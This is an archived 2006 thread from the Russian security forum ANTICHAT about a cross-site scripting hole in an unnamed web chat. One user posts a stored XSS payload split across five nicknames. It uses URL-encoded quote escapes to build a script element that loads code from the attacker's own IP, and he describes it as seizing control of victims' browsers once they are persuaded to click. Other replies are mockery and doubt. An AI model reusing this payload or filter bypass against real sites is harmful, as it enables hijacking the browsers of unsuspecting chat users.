ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

19.04.2006, 14:30
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме: 7426415
Репутация:
1398
|
|
Поцан ыт не реально настиигал. Как у тебя Xss работает не помняно =))
|
|
|

19.04.2006, 17:05
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме: 6127131
Репутация:
774
|
|
Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.
__________________
Завтра будет.Лучше.
|
|
|

19.04.2006, 20:47
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме: 132146
Репутация:
0
|
|
Читайте пожалуйста вдумчиво!!!!!!!!
Заходим под пятью никами:
1) %27,d%3Ddocument,%27
2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ -->
3) %27,p%3D"http://",%27
4) %27,p%3Dp+%27my_IP
5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером -->
%27 значит ' <--! Обход фильтров -->
%3D значит =
Затем упрашиваем Чатлана попорядку кликнуть по никам и ............
Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123
Затем просто наведите мыш на ник и посмотрите в строку состояния броузера.
Ну вроде всё расписал подробно !!!
Ёщё будут вопросы???
|
|
|

19.04.2006, 20:50
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме: 132146
Репутация:
0
|
|
Да и помогать до ламывать не надо Забудьте я пошутил.
|
|
|

19.04.2006, 21:28
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
Читайте пожалуйста вдумчиво!!!!!!!!
Заходим под пятью никами:
Как ты себе это представляешь? Слушай! сними видео о том, как зайти под пятью никами...
|
|
|

20.04.2006, 00:05
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме: 2398258
Репутация:
648
|
|
faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю.
Так чего, тему закрывать?
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|

20.04.2006, 00:07
|
|
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме: 3238231
Репутация:
165
|
|
по видимому, да. не можем мы его допонять полностью.
|
|
|

20.04.2006, 00:31
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме: 132146
Репутация:
0
|
|
Слушай censored!
Всё что я написал реально работает я всё ето проделывал лично.
Я просто думал , может на основе етой дыры кто то ломанёт ещё круче .
А никто неможет вьехать даже в расжованый XSS
Да тему закрывай.
|
|
|

20.04.2006, 19:19
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
ДА Я ЛАМЕР
|
|
|

20.04.2006, 20:29
|
|
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме: 3279330
Репутация:
343
|
|
а почему ник у тя фиолетовый?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|